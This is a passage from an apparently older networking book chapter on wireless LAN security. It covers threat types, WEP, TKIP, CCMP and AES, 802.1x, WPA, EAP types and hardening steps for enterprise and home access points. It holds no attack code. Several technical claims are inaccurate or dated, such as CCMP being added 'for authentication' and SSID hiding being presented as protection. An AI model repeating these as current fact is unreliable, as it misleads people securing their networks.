"authenticating" yourself. If the card is permitted access, the door is unlocked. Note that in this analogy,
the card is authenticated, not the person carrying the card. Furthermore, the ID card does not provide
security after you're inside the door. As such, you can make the distinction between two forms of
authentication: One is authentication of the user, and the other is authentication of the device.
User-Based Authentication
User-based authentication is probably the most common form of authentication deployed in today's
enterprises. Users are given a password that only they are supposed to know. A system challenges the
user to provide a username and password. After the pair is checked against a corresponding database,
the user is either granted or declined access.
This method's considerations and challenges include password strength and password management.
Because in-depth coverage falls outside of the scope of this book, refer to other resources, such as
Security and Usability: Designing Secure Systems That People Can Use by Lorrie Faith Cranor and
Simson Garfinkel (O'Reilly Press, 2005), if you are interested in learning more.
Machine-Based Authentication
Machine-based authentication goes a step further and verifies the identity of the devices that attempt to
join your WLAN. Machine-based authentication is credential-based with the credential hard-coded in the
device. This credential is a password of sorts for the machine. Like a person, the machine must be
registered to be able to use the network. This credential is either derived or stored locally, or it can be
dynamically assigned.
These methods will vary in complexity, but all are tied to an authentication service that is present in the
core infrastructure.
Native Encryption and Authentication But No Hashing

The most common mechanism used by enterprises to secure WLANs is the incorporation of both
encryption and authentication. Both can be provided in numerous ways. Authentication and encryption
have evolved to combat numerous attacks, vulnerabilities, and protocol shortcomings. This evolution has
also increased their complexity.
Data encryption can be achieved in many ways. Encryption can be performed using either symmetric or
asymmetric, that is public/private, key pairs, and the keys can be either statically or dynamically
assigned. Asymmetric keys are typically harder to break because it requires more computational
horsepower. Similarly, dynamically assigned keys generate more computational overhead. However, the
automation greatly simplifies key management. As the computing power of clients has increased, the
encryption on the WLAN has evolved from the simple but hard to manage WEP to complex but easy to
manage certificate-based key pairing. The later section "Encryption" will go into more detail on this
subject.
Authentication and Encryption Using Overlay Security Solutions

Overlay security solutions employ higher levels of the OSI model to secure communications. Even at
these higher levels, the same basic security features exist: encryption, authentication, and hashing.
However, given the availability of additional information and embedded intelligence, the result is a higher
degree of security sophistication. As such, Virtual Private Networks (VPN) and generic routing
encapsulation (GRE) tunneling provide a more secure form of end-to-end communications. Both
solutions work on the premise that a secure virtual communications tunnel is constructed between the
communicating endpoints through which all data is securely sent. The use of an overlay security solution
can sometimes cause disruption because the "tunnel" is a virtual point-to-point connection that needs to
be reestablished anytime the connection is broken. Overlay solutions can also cause an added burden to
the user or administrator. The user must complete an additional layer of security (setting up a VPN), and
the administrator needs to manage all the virtual tunnels.
Note
GRE tunnels are not the means of encryptionthey are only the logical manner in which
encrypted traffic is routed in the network. For the GRE tunnel to be encrypted, it requires an
underlying protocol, such as IPSec or 3DES. Both are commonly used for encryption today.
No WLAN
Although it is not practical, not allowing the use of WLANs is one way to consider handling the issue of
security. This book is an advocate of deploying WLANs when they make the best business sense. In this
case, "no WLAN" should mean "No WLAN at this time."
WLAN Security Threats

The nature of wireless communications makes defending against attacks very difficult but extremely
necessary. Threats come in many forms. The vulnerability and exposure of your network comes from
inside and outside your network. Arguably, the internal troubles typically outnumber the external
threats.
Security threats surface as disruption in service, unintentional leaks, and industrial espionage. Both
professionals and amateurs carry out attacks against WLAN security shortcomings, which is facilitated by
a plethora of publicly available tools. Even then, it might not be a person but rather a byproduct of a
careless design. The following describes three profiles of people who can compromise a network.
The malicious hacker This is the person who actively tries to exploit security weaknesses of the
network. This person's intent is to cause mischief, steal intellectual property, or cause business
disruption.
The unaware employee The unaware employee is becoming more common. This is a person who
has unintentionally opened a vulnerability either directly (such as by installing a rogue AP) or
indirectly (such as acting as a catalyst for the spread of a computer virus).
The war driver War driving is when individuals or groups drive around and actively look for
unprotected WLANs. In some cases, people mark the streets or sidewalks with chalk to indicate the
presence of unprotected WLANs, which is also known as war chalking.
Now that we know who can carry out WLAN attacks, we will outline the different attack strategies that
can be employed. The attack strategies are interception, rogue APs, and denial of service.
Interception
Because there is no physical link in wireless and because radio transmissions are not contained by
physical boundaries, data can be intercepted. Any data that is intercepted is compromised as it can be
reassembled, resulting in loss of intellectual property or exploitation of other safeguards.
You can, however, put security protocols into place to mitigate or thwart the threat of interception. This
is covered in the next section. Interception provides a catalyst for malicious behavior in one of two
ways:
Eavesdropping Data sent over a wireless medium can be captured over time. Given enough time,
even encrypted data can be decrypted, although well-developed encryption techniques will extend
this time from days to years.
Impersonation Commonly known as "man-in-the-middle" attacks, even when the data is
sufficiently protected against prying ears, devices can be impersonated. This can lead to service
availability attacks or inadvertent data capture with the latter leading to the possibility of encryption
cracking.
Rogue APs
Rogue access points are by far the most elusive culprits in a WLAN deployment. Many vendors are
building solutions that will tackle the problem of rogue APs. Basically, rogue APs are internal or external
to your network and can either create a security hole or cause enough interference to disrupt service.
Internal rogues usually occur when an employee introduces an AP to the internal network.
Ongoing commoditization has resulted in a steep drop in the price of access points. As the cost barrier is
removed, some people will not only purchase an AP, but also independently decide to "plug" the
personal AP into the network in an attempt to gain more freedom and mobility. One way to thwart this
problem is to provide ubiquitous WLAN coverage. However, you can't be sure that this solution will stop
the practice entirely.
Roque APs are typically not intentionally malicious, but require more effort to detect and mitigate. They
threaten the network's well-being and the integrity of the wireless space. Because WLANs rely on the
availability of channels of the RF spectrum, having competing devices in the same RF space will likely
disrupt your WLAN service.
Denial of Service Attack

A sometimes overlooked security threat is the overloading of the network that results in the inability to
access the network. This Denial of Service (DoS) is a very real threat and can be easily carried out
against a WLAN. These attacks, although usually intentional, can sometimes happen by accident. DoS as
a security concern can never be ruled out because it can never be completely avoided. DoS has one
critical effect on the enterprise: the denial of access to the RF space and thus the lack of network access.
You learned in Chapter 2 that there is an opportunity cost associated with unavailability of network
access. As the organization becomes more dependent on information and network access, this
opportunity cost can rapidly escalate with downtime.
Wireless Security Mitigation Techniques

WLANs employ specific methods for encryption, hashing, and authentication. Figure 7-1 illustrates the
general elements that make up the embedded WLAN security.
Figure 7-1. Embedded WLAN Security
Encryption
Encryption is the action taken to mask the elements in a data stream. This is done by applying a variable
(key), which is known by a sending station and a receiving station, to an algorithm that encodes and
decodes the transmission. In this section, you will find three basic flavors of encryption that have been
applied to WLANs for securing over-the-air transmissions. Each is still suitable for use today. However,
they are typically not used in Enterprise environments as they are insufficiently robust.
The initial encryption method was WEP, which provided sufficient protection in early WLAN deployments.
Over the years, the ability and desire of people to crack encryption algorithms and break cyphers has
increased. As such, more robust encryption schemes are continuously developed to offset weakened
methods and to retain the possibility of secure communication. WLANs have thus seen the displacement
of WEP by the schemes named CCMP and AES. Let us compare these three methods.
WEP
WEP is an encryption algorithm that is built into the original 802.11 standard. WEP encryption uses the
RC4 stream cipher with either 40- or 104-bit keys and a 24-bit initialization vector. WEP was initially
deployed as a static key written onto the client, which caused a burden on key management.
Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP)
CCMP is a 128-bit keys cipher with a 48-bit initialization vector (IV), which helps prevent replay attacks.
The Cipher Block Chaining Message Authentication Code (CBC-MAC) component of CCM provides data
integrity and authentication.
Note
Although CCMP is a very strong encryption standard but it requires more computing power
than WEP. This is important because some wireless access points might not have sufficient
computing power to support CCMP.
Advanced Encryption Standard (AES)

AES was developed for securing sensitive but unclassified material by the U.S. government. By directive
of the National Institute of Standards and Technology (NIST), a replacement for the Data Encryption
Standard (DES) and to a lesser degree 3DES was commissioned. The specification required a symmetric
algorithm using a block encryption of no less than 128 bits in size. Note that AES also forms the
underlying encryption algorithm used in CCM. Its requirement and subsequent ratification by the U.S.
government prompted acceptance by the general public.
The capability of AES encryption to remain protected is estimated to be years as opposed to weeks or
days of current encryption methods.
Note
AES was built on the cipher developed by two Belgian cryptographers, Joan Daemen and
Vincent Rijmen, called Rijndael.
Hashing
Hashing prevents man-in-the-middle attacks as it ensures that messages that have been tampered with,
while they were in transit, can be identified by the receiver. This is independent of whether the message
is encrypted. This section details Temporal Key Integrity Protocol (TKIP) and Message Integrity Check
(MIC), which we refer to as radio side protection throughout this chapter. Both of these are used to
maintain the integrity of the information sent over the RF.
TKIP (Temporal Key Integrity Protocol)

You can think of TKIP as a wrapper or enhancement for WEP. WEP is still the underlying encryption
standard, but TKIP significantly improves the security by addressing its weak hashing capabilities. Using
TKIP, every key is "rehashed," effectively giving each packet its own key. Because the attacks upon WEP
rely on capturing tens of thousands of packets that use the same key to attempt to identify the actual
key, TKIP never reuses the same key. As such, it greatly reduces the risk of the key being discovered.
TKIP is also part of the WPA standard.
Message Integrity Check

In order to combat the ability of a hacker to intercept, examine, and forward on a packet to an AP, there
is a need to provide an additional layer of radio side protection. This is done through the insertion of an
8-byte MIC placed between the data portion of the 802.11 frame and the 4-byte Integrity Check Value
(ICV). The MIC field is encrypted along with the frame data and the ICV. This is essentially a cyclic
redundancy check (CRC) for wireless and is intended to prevent replay attacks, that is replay of an
intercepted packet.
Table 7-1 summarizes the different security models described.
Table 7-1. Different Security Models at a

Glance
WEP
TKIP
CCMP
Cipher Type
RC4
RC4
AES
Key Size
40 or 128 bits
128 bits
128 bits
Key Life
24-bit IV
48-bit IV
48-bit IV
Integrity
Check
CRC-32 (Data
only)
MIC
CCM
Replay
Counter
None
Inherent
Inherent
Key
Management
None
EAP-based
EAP-based
Authentication
Authentication is the process in which the identity of a user or device is validated. This is typically done
using passwords or certificates. Note that authentication assumes some degree of implicit trust. For
example, the use of passwords assumes that it is only known by the authenticating entity. The same is
true for certificates as they, in theory, can be handed off to somebody else. Furthermore, in the case of
certificates, you need to trust the authority that extends the certificates.
This book does not cover this topic in-depth. However, you should be aware of these nontrivial
challenges regarding trust and authentication. In the remainder of this section, we cover the methods
and frameworks that are commonly used in WLANsspecifically, 802.1x, Wi-Fi Protected Access (WPA),
and 802.11i.
802.1x
The 802.1x standard is a framework that defines a common process of communication for both wired
and wireless LAN-based devices to initiate and secure point-to-point authentication. The 802.1x LAN
standard can be applied to any subset of the 802 family. Its mainstream debut came at the time when
WLAN products hit the mass market. Because standalone WEP was already known to be weak, 802.1x
found a niche in which it could help to ensure the secure transmission of data in a WLAN. It is very
important to understand that the standard only outlines the framework for communication. This
freamework allowed vendors to provide various underlying authentication methods (which you learn
more about in the section "EAP Types"), each with its own distinctive features.
The framework defines mutual authentication of devices and recommends the use of RADIUS as an
authentication protocol. There are three key components to the 802.1x framework:
Supplicant (STA) The client device that is requesting access. Typically this device is enabled by
software, which performs the actual process.
Authenticator (Auth) Plays the role of the middle man, providing an entry point from an
untrusted network to a trusted one.
Authentication server (AS) Acts as the validation point of contact. The authentication server
maintains a database of all known authenticators and also maintains entitlement for the user or
device. This user database can reside on a separate system.
The authentication communication between a client device and the authentication server is broken into
two stages, as shown in Figure 7-2:
The first mode is Extensible Authentication Protocol (EAP), or EAP over LAN (EAPoL), which is the
encapsulation format.
The second mode is RADIUS, where the credentials are passed for validation against the
authentication database.
Figure 7-2. 802.1x at a Glance
Note
In Figure 7-2, the supplicant can be any end device (laptop, desktop, PDA, phone). The
authenticator can be a switch or AP.
Wi-Fi Protected Access

Wi-Fi Protected Access (WPA) is a standard developed by the Wi-Fi Alliance primarily as a method for
interoperability between Wi-Fi vendors. The Wi-Fi Alliance is a coalition of vendors with the charter of
finding a common solution for wireless security. The WPA standard helps to mitigate the inherent
shortcomings of WEP by protecting the transmission of data in the RF space by mandating the use of
TKIP, MIC, and 802.1x.
WPA has two modes:
EAP and RADIUS in enterprise mode
Pre-shared keys (PSK) in non-RADIUS environments
WPA is built to support WEP as the encryption method, whereas the second phase of WPA, WPA2,
supports the addition of CCMP for authentication.
Table 7-2 summarizes the features of the different WPA types.
Table 7-2. Differences Between WPA Types at a Glance

WPA Enterprise Mode
WPA PSK Mode
WPA Enterprise Mode
WPA PSK Mode
Requires an authentication server
Does not require an authentication server
Uses RADIUS protocols for authentication and key

distribution
Uses shared secret keys for authentication
Centralizes management of user credentials
Provides device-oriented management of user

credentials
Uses 802.1x as an identity framework
--
802.11i
Based on WPA, the IEEE has ratified 802.11i as a wireless security standard to help provide a more
robust method of protection. This standard introduces new and stronger encryption and hashing
methods. It expands the initial validation (handshake) between the AP and client while still using 802.1x
for the actual authentication process. 802.11i also mandates the use of AES. The principle
enhancements are
Discovery A four-way handshake to authenticate the AP and client
Authentication The 802.1x framework for end-to-end authentication
Key management Method through which systems derive an encryption key that ensures integrity
for the whole session
Data Protection Encryption of parts of the data packet
Figure 7-3 illustrates the relationship between these four parts of 802.11i. Each shaded area refers to
one of the four functions listed previously.
Figure 7-3. Functions of 802.11i
802.11i uses EAP as the end-to-end transport for authentication and 802.1X (EAPoL) to encapsulate
these EAP messages over WLANs.
During the discovery phase, participants determine the parties with whom they will communicate. The
AP informs the client which security features are required to be used for communications.
Authentication employs 802.1x as a framework and further specifies the following:
1. The use of centralized network admission policyat the AS.

2. Determination of the STA as to whether it does indeed want to communicate.
3. Mutual authentication between the STA and Auth.
4. Generation of a master key as a side effect of authentication.
5. Use of a master key to generate session keys.
Key management also uses the 802.1x framework with the addition of a four-way handshake, which
ensures that the client and AP are valid devices (trusted). Because the session key used in client and AP
transmissions is valid for the length of the session, an additional mechanism was added to the protocol
to help maintain the integrity of the key. Specifically, the following actions take place (four-way
handshake):
1. Bind Pair-Wise Master Key (PMK) to STA and

AP.
2. Confirm that both AP and STA possess a PMK.
3. Generate new Pairwise Transmit Key (PTK).
4. Prove each peer is live.
5. Synchronize PTK use.
EAP Types
The Extensible Authentication Protocol (EAP) is a framework for sending authentication information and
encryption keys from the authentication server (AS) to the client (STA) and AP (Auth). The
authentication methodologypassword-based, public key infrastructure (PKI), or certificateis set by the
organization.
The EAP session thus adopts the following event sequence:
1. A wireless client associates with an access point, which prohibits the client from gaining access to
anything (except the authentication server) on the network until it has logged in and authenticated.
2. The client (STA) and AP (Auth) perform a mutual authentication (handshake). The AP receives an
authentication request from the client and sends back a challenge. The client then completes this
challenge. The AP then forwards the information to the authentication server (AS), using the
client's and AP's credentials.
3. When successful, the client and authentication server derive an encryption key. The key can be
derived in several ways, and each EAP type defines the specifics. Additionally, during the process,
the client and server also derive a broadcast key. All data is subsequently encrypted using this key
pair.
4. As a further measure to maintain integrity, the key pairs can be changed at regular intervals. The
AAA server manages this function.
The following list describes different EAP types. Note that this is not a comprehensive catalog of all EAP
types. However, it does include all the mainstream versions:
EAP-TLS (Transport Layer Security) Developed by Microsoft as a LAN-based authentication
type.
EAP-LEAP (Lightweight Extensible Authentication Protocol) The Cisco version that was
developed exclusively for WLAN security. It is also known as Cisco-EAP.
EAP-PEAP (Protected Extensible Authentication Protocol) Developed by Microsoft, Cisco, and
RSA Security.
EAP-FAST (Flexible Authentication via Secure Tunneling) Second-generation WLAN security

EAP type from Cisco.
EAP-TTLS (Tunneled Transport Layer Security) Developed by Funk Software and Certicom.
Table 7-3 summarizes the features of different EAP types.
Table 7-3. EAP Type Features

Security Type
User
Auth
WEP
Device
Auth
Tunneled Certificate Based

Server
Client
TKIP /
MIC
EAP-TLS
EAP-TTLS
Cisco-EAP (LEAP)
EAP-FAST
VPN
PEAP
Building a Secure WLAN

This section provides guidelines for building a secure WLAN. These recommended practices are offered
as tried and tested methodologies for addressing this challenging topic. Every enterprise comes with its
own unique environment, infrastructure, and security challenges, but by following these suggestions and
tailoring them to your specific needs, you can be sure that you have addressed the most common
security issues encountered today.
Trusted Versus Untrusted Wireless Networks

One of your first decisions is whether your wireless network will be trusted or untrusted. This is an
architectural issue, but it has a fundamental impact upon the security model you adopt. In the trusted
model, you consider your WLAN to be an integral part of your intranet. The WLAN lies inside your
secured fortress. In the untrusted model, you regard your WLAN as an extranet. The WLAN lies outside
the secured perimeter of the organization. As such, you should make this decision very early in the
planning or design phase of the PPDIOO lifecycle.
Trusted WLANs
Trusted wireless networks are fully integrated into the existing enterprise network. It is assumed that
the integrity of the network is implicitly protected. WLAN security is placed at the network edge, where
the clients or devices authenticate and the traffic is encrypted. From a security perspective, trusted
wireless networks are the preferred type of deployment today.
The advantages of a trusted WLAN include
Ease of use
Variety of EAP mechanisms
Possibility of single sign-on
Capability to roam across Layer 2 and Layer 3
Ability to support wireless voice and multicast traffic multicast traffic
Untrusted WLANs
In an untrusted wireless network, the assumption is that the network integrity is easily compromised.
This assumption indicates that security does not exist or is incapable of providing necessary protection.
Data in an untrusted WLAN is therefore considered "open," and hence there is the need to be explicit
about security.
The advantages of an untrusted WLAN include:

No differentation among traffic as all traffic is considered suspect.
Isolation of WLAN attacks as the WLAN is separate from the enterprise network.
No additional infrastructure is needed to support WLAN security.
Define a Clear Security Posture

A security posture is a framework of terms, protocols, standards, and policies that relate to protecting
your wireless environment. It should at a minimum provide guidelines for
The particular encryption protocols you choose
The authentication method and standards adopted
Your password policy
A user access policy
A list of the devices and clients your WLAN will support
The critical steps of selecting an authentication mechanism and encryption strategy for your WLAN are
discussed next.
Note
A common mistake when developing a security plan is to confuse authentication with
encryption. Authentication is the process of validating an end user or device, whereas
encryption is the function of hiding the original text in a cipher.
Define Your Authentication Mechanism

Earlier in this chapter, you learned about the two authentication types: user-based and machine-based.
The most commonly adopted and recommended authentication mechanism is EAP. An added advantage
of EAP is that it supports both types of authentication. Your choice of EAP type is impacted by many
factors, including the following:
The client devices you intend to support
Your existing security policy
Your existing security infrastructure

The capabilities of your security system to support different authentication methods, especially
different ones, simultaneously
Some EAP mechanisms make it extremely difficult to compromise a WLAN; however, they are
correspondingly difficult to set up and maintain in large deployments. If security is of the utmost
importance, this additional operational overhead is probably acceptable. On the other hand, some EAP
mechanisms offer less protection and should not be seriously considered for an enterprise-class
deployment. Carefully consider the tradeoffs between robustness of the authentication scheme, ease of
management, and computational requirements on the client's end. Unavailability of appropriate software
on clients typically limit the type of EAP you can practically use. Supporting a wide range of devices adds
more analysis of the EAP type selection process. Refer to the section "EAP Types" for more information.
The impact that clients have on your EAP selection are directly related to the following questions:
Does your enterprise certificate require a Certificate Authority (CA)?
Do you use shared keys, which require a public key infrastructure (PKI)?
What client platforms will you support?
What client authentication systems are you already using?
Different EAP types strike a different balance between complexity and security. Figure 7-4 depicts the
trade-off for common EAP types.
Figure 7-4. The Difficulty, Complexity, and Level of Security for EAP Types
Select Your Encryption/Data Integrity Type

Another significant decision for wireless security is choosing an appropriate encryption type for your
environment. Although you might be inclined to choose the most secure option available, this choice
might not be practical for your environment. Complexity, computational power, and user convenience
are also key considerations. Yet again, a balance is required.
Currently, the most popular standard is 802.11i using the Advanced Encryption Standard (AES). AES's
benefit of robustness comes at the expense of increased computational overhead. Devices that intend to
use AES should be foreseen of sufficient computing power so that they can process encryption
transparently without negatively impacting other tasks of the device. Therefore, the more practical issue
you need to consider is determining the most secure method that all your approved devices can handle
given their existing compulational horsepower. An alternative strategy is to deploy multiple security
types in function of the capabilities of the devices you support.
Establish a Password Policy

In any networked enterprise, it is important to have a password policy, and it is highly likely that you
have already defined yours.
In some enterprise deployments, a completely separate set of user credentials is used to provide access
to the wireless network. One-time passwords (OTPs) are a good example. Users do not enter their
"native" credentials to access the WLAN; instead, they use a randomly generated OTP provided by a
smart card or by software on the client device.
Just like any of the other security decisions you make, the password policy must take into account
conflicting goals such as ease of use, deployment, and support (for users and devices).
Here are some considerations:
OTPs:
- Select a smart card vendor or manufacturer if you have not already.
- Consider the back-end infrastructure to support the OTP system.
- Consider the operational overhead and support impact of deploying OTP software or
physical smart cards to every user.
Native user credentials:
- Implement a strong password policy that requires complex passwords: a mixture of
uppercase, lowercase, and extended characters.
- Require passwords that are longer than the usual eight characters.
Wireless-only alternate user credentials:
- Consider the overhead of maintaining a set of alternate user credentials.

- Consider the impact of users having to remember another set of credentials.
- Alternatively, if you choose to store or cache the credentials on the device, you must assess
the risk of them being compromised.
Note
There is an added risk concerning the protection of authentication credentials when they are
cached on a device. Sometimes, however, this does not outweigh the benefits of caching
credentials. For example, hospitals often store user IDs and passwords on devices so that
doctors are not troubled with entering them.
Define a Clear WLAN Security Policy

Defining a clear and consistent security policy is an essential part of securing your WLAN. This WLAN
security policy should provide quidelines for
Who has "ownership" of the RF airspace within the enterprise?
Who can install access points or WLANs?
What operating systems are supported?
What client devices are supported?
Note
A security policy is a collection of practices and guidelines that set a standard for behavior and
use on the network. A security policy is different from a security posture in that a security
posture represents a collection of actions that are used to provide a level of protection for the
network.
Secure Your APs

Policies and procedures only set guidelines. As such, specific measures must be in place to reduce risk.
Configuring your access points correctly is a critical step in securing your WLAN. We recommend that
you specifically address the following parameters of access points.
SSID
As described in Chapter 1, "Introduction to Wireless LAN Technologies," the Service Set Identifier (SSID)
is analogous to a network name. It is used only to identify your network to client devices. Hence, it is
not a true security measure. SSIDs are part of operational recommended practices. They are the first
step toward compromising your network. Any default setting is an open invitation for malicious attack
and therefore should be changed. An added security measure is not allowing your SSID to be broadcast
openly. This measure helps to eliminate any accidental discovery of the SSID. If broadcasting the SSID
is necessary (such as guest networks), it should be put into a separate network space, such as VLANs.
Implement a Secure Management Policy for APs

To secure your WLAN, you must also implement a policy to manage your APs so that standards can be
updated and enforced. The following list outlines the essential steps:
Step 1.
Create a management VLANThe management VLAN should be created on the wired

interface of the access point. It is used to separate management traffic, such as SNMP and
SSH, from data traffic. By limiting management to a particular VLAN, you can provide a more
secure path for critical traffic to prevent it from being "overheard."
Step 2.
Disable non-secure protocolsSpecifically, disable the following protocols:
Telnet Although Telnet allows for remote administrative logon to the access point, it is
not a secure protocol as it transmits allincluding passworddata in clear text. Disable
Telnet on all VLANs, including the management VLAN.
HTTP access HTTP access to the access point provides users and operational staff with
the ability to configure the device through a web browser. Once again, this is typically
an insecure feature and should be disabled if at all possible. If your support staff
absolutely must have HTTP access to the access points, then it should be limited to the
wired management VLAN only. However, because the risk of transmission in clear text,
we strongly recommend that HTTP access be disabled altogether.
Other non-essential management protocols Nonessential management protocols
should be disabled. For example, if you are not using SNMP, RMON, or CDP in your
existing network management framework, disable the protocols on the access points.
Step 3.
Enable secure protocolsEnable the following protocols:
Secure Shell Protocol (SSH) Provides the same functionality as Telnet (remote
access to a command-line interface on the access point) but provides communication
over a secure channel.
TACACS or RADIUS Use TACACS or RADIUS to provide a centralized authentication
framework for device administration. This will mean you do not have to manage
individual admin accounts on each access point and will ensure that you can easily
update and control all administrative access to the wireless devices.
SNMP Simple Network Management Protocol (SNMP) is a set of protocols commonly

used to manage network devices. If you use SNMP, you should configure strong and
complex community strings and change them often. Additionally, you might want to
consider using SNMP Read Only if possible because it will prevent SNMP devices from
changing access point configuration; however, this might not be possible depending
upon how you manage your network.
SNMP traffic should be limited to a particular list of host devices (SNMP network
management tools) or subnets. IP address filtering (also known as Access Control Lists,
or ACLs) is a common security feature, and in this circumstance, it allows you to limit
the devices that will send and receive SNMP traffic.
Prevent Layer 2 MAC Address Spoofing

Many access points and network devices allow you to configure Layer 2 MAC address spoofing
prevention. This step prevents devices from using a MAC address other than their own. Many attacks are
based upon spoofing a different MAC address, and this step will help mitigate that risk.
Note
Publicly Secure Packet Forwarding (PSPF) is a Cisco feature that allows you to prevent interclient communication on WLANs. This means that two stations cannot consciously or, more
importantly, inadvertently share files with others that use the same AP. PSPF allows network
access to client devices without providing other capabilities of a LAN, such as peer-to-peer.
This feature is especially useful for public wireless networks like those installed in airports or on
college campuses.
Reduce Transmit Power to Only That Required for Coverage

Access points can transmit at various signal strengths. The higher the signal strength, the greater the
distance that RF propagates, and therefore the greater the covered area. To avoid the risk of
unauthorized users connecting to your WLAN, it is important not to let your radio signal "bleed"
uncontrolably into the surrounding area.
By reducing the transmit power, you can more carefully manage your cell size and design, controlling
the degree to which your WLAN extends outside of your physical building or office space.
Managing the power and range improves security by reducing the potential threats to your WLAN.
Although this technique reduces the footprint that an attacker can use to exploit the network, it only
prevents casual discovery. DoS attacks are still a possibility as an attacker can still transmit into your
network causing radio interference.
Consider Directional Antennas
Directional antennas allow you to shape the coverage area of your WLAN. Although not a security setting
per se, directional antennas can, like reducing transmit power, help ensure that wireless coverage does
not bleed into areas that you do not want to cover. Even when physical and logical security are tight,
there is no reason to extend your footprint into uncontrolled areas.
Note
Directional antennas can also be used to provide more accurate coverage in problematic
deployment spaces, such as large factory floors, hallways, and operating rooms.
Physically Secure APs

You should physically secure the access points. Many manufacturers provide mounting brackets that
allow you to physically lock down access points. This is important because access points can contain
information on the configuration of your network. Ensuring physical security of the device not only
protects your capital assets but also removes one more potential area where attackers can target your
deployment.
Use AAA
The authentication, authorization, and accounting (AAA) architecture you use is important for all network
security, and WLANs are no different. WLANs require a method to authenticate users and to manage an
encryption key exchange. AAA systems provide the industrial strength authentication management
system needed to support this in a scalable and resilient fashion. As a backbone service, the AAA
systems need to have a breadth of support for EAP types and must be scalable.
AAA and EAP

Remembering that EAP is the recommended method for securing the radio transmissions of your WLAN,
you should ensure that your AAA service can support an EAP type. The EAP family of protocols is
"extensible," meaning many varieties are available, including several proprietary versions. Some AAA
servers do not support all EAP mechanisms. If you already have an existing AAA server in your
infrastructure, it is crucial that you ensure that it supports the EAP mechanism you choose for your
WLAN. Alternatively, you could install a dedicated AAA server or servers for WLAN use only. However,
this is likely to be cost-prohibitive because more devices need to not be acquired but also managed on
an ongoing basis.
AAA Scalability and Availability

Like all centralized services on a network, it is important that your AAA infrastructure is scalable and
stable. Because AAA servers are fundamental to a secure network, their availability and reliability are
essential for a secure network. If you are deploying a large-scale or global network, it's important to
plan your AAA architecture accordingly. Centralizing all authentication on a single system is not good
practice; it's better to use a distributed system with several AAA servers to avoid a single point of
failure. A distributed AAA architecture not only has better resilience and disaster recovery capabilities
but also provides the added benefit of load-balancing among available AAA servers. In global
deployments, for example, it's common to have AAA servers regionally dispersed. Not only does this
ensure that you have a resilient system, but it also keeps authentication traffic regional.
Some solutions allow AAA services to reside locally, which means that the authentication is performed on
the AP or switch servicing that WLAN. This solution can be attractive for very large-scale deployments
where you might have hundreds or thousands of local WLANs (for example, small retail stores or bank
branches).
Remember that losing connectivity to your AAA server means that users cannot authenticate; therefore,
the WLANas a transport medium to the network as a wholeis unavailable. As such, a robust AAA
architecture is essential.
Physically Secure the Office Space

A necessity of any network is ensuring physical security of the environment. Your wireless network is no
different and in some cases can be considered more susceptible to attacks by intruders because APs are
typically not placed in secured wiring closets, but rather in open areas. It is therefore essential, for many
reasons, that you have good physical security in your office space and adjacent areas.
Note
Many large corporations have sizeable parking lots or public areas that surround their office
buildings. It is prudent to make your security staff aware that uninvited or "suspicious" visitors
might be attempting to eavesdrop on your WLAN. Educate them to be aware of potential war
walkers and war drivers.
Communicate with Your Users

A robust wireless security posture, a strong wireless security policy, and comprehensive security
procedures are all devalued if your user population is unaware of them or ignorant of the risks of poor
behavior. As such, communication with your users about security is a fundamental aspect of securing
your WLAN. The vast majority of your users will be welcome partners in your ongoing security efforts if
they are engaged successfully and educated on how to help.
Consider using multiple communications methods to provide your user community with a comprehensive
source for information about the wireless network. Include FAQs, user education documents, WLAN
news bulletins, deployment updates, and even links to software and external resources. We recommend
that, at the very minimum, you engage in communications with your WLAN users regarding the following
three topics:
WLAN security policy Your wireless security policy should be clear and concise when
communicated to your users. Make the policy easy to understand and free from as much technical
jargon as possible.
Fundamentals of wireless Educate your users about the benefits and the fundamentals of
wireless networking. The vast majority of users will work with you to secure your network through
responsible actions. For example, when people understand the risks associated with rogue access
points, most will refrain from installing them. Treat your users as partners, and they will greatly
assist you in securing your network.
Updates on security developments Your network users are best served when they know what
developments happen in the wireless security world, including current risks, common types of
attack, and possible intrusion efforts (hacks). Network security is a constantly evolving area with
new attacks and tools being developed continuously. It is important to remain aware of
developments in this area and pass that information on to the user community in a timely manner.
Secure Wireless at Home

If your company provides remote access services to your users, then a home wireless networking
policies and guidelines are recommended. Many large enterprises allow their users to connect to the
corporate network from home. In many circumstances, these remote access services are provided not
only by standard analog modems but also by "always on" high-speed connections, such as cable
modems, xDSL, ISDN, and even dedicated Frame Relay or WAN links. In all cases, it is very important to
publish strict guidelines on the acceptable use of wireless devices at the home. Consider that these
services effectively extend the corporate network to your users' homes. The WLAN access point that is
installed at the home is no different than a rogue AP and hence brings along the same risks.
The different strategies for mitigating these threats are discussed next. Note that not all the solutions
enable the full extension of the corporate network to the WLAN-enabled home.
Ban Home Wireless on Corporate Remote-Access Equipment

A policy decision could be made simply to ban the use of wireless access points on corporate equipment
at users' homes. This is in some ways the easiest solution but the one that has the most negative impact
on the user. However, any such ban needs to be preceded with education on the merits of such a
position.
Provide Corporate Support for Home Access Points

A list of recommended or supported WLAN devices can be created, with specific configuration guidelines
for each. Your users can then configure their access points using the instructions provided to conform
with corporate security requirements.
Provide Home Wireless Recommended Practices

A list of recommended practices specifically for home wireless networking can be provided for your
users. These best practices might not provide detailed configuration guidelines for every make and
model of access point, but they should provide the users with advice on the "high-level" concepts of
configuring their devices securely.
Provide a simple step-by-step guide such as the sample presented here. A dual approach consisting of a
"quick setup" as well as a more comprehensive and detailed version is ideal:
Step Change default SSIDYour access point will come with a default SSID when you install it. Change
1.
this as soon as possible to avoid the compromise of the AP.
Step Disable SSID broadcastAccess points broadcast their SSIDs by default. This is not necessary
2.
for most home wireless networks. Disabling this feature will not allow neighbors to easily discover
your home WLAN.
Step Enable WPA-PSKMost access points now support WPAPSK (Wi-Fi Protected Access Pre-Shared
3.
Key). This encryption and key management standard greatly increases the security of your home
wireless network. WPA-PSK is configured on both your access point and any devices you use on
the wireless network (desktop and laptop PCs, and so on). As it is configured by using a shared
secret on all devices. Create a shared secret that is at least 20 characters long and not easy to
guess.
Step Change the default admin login passwordChange the default password for the admin account
4.
on your access point to avoid unauthorized users gaining the administrative access that allows
configuration of the AP. The default password is well known and hence it defeats its purpose.
Change it to something only you know or will remember. Choose a strong password and not one
that is easy to guess such as "password" or "1234".
Step Change default IP addressAccess points come pre-configured with a particular IP address when
5.
they are installed. Typically, it is 192.168.1.x (where x is a number between 1 and 254). Most
hackers are familiar with these IP addresses. You should change this value and choose an IP
address in the range 192.168.x.1 (where x is a number between 2 and 254 to make it harder for a
hacker to infiltrate your network). For example, you could change the default IP address to
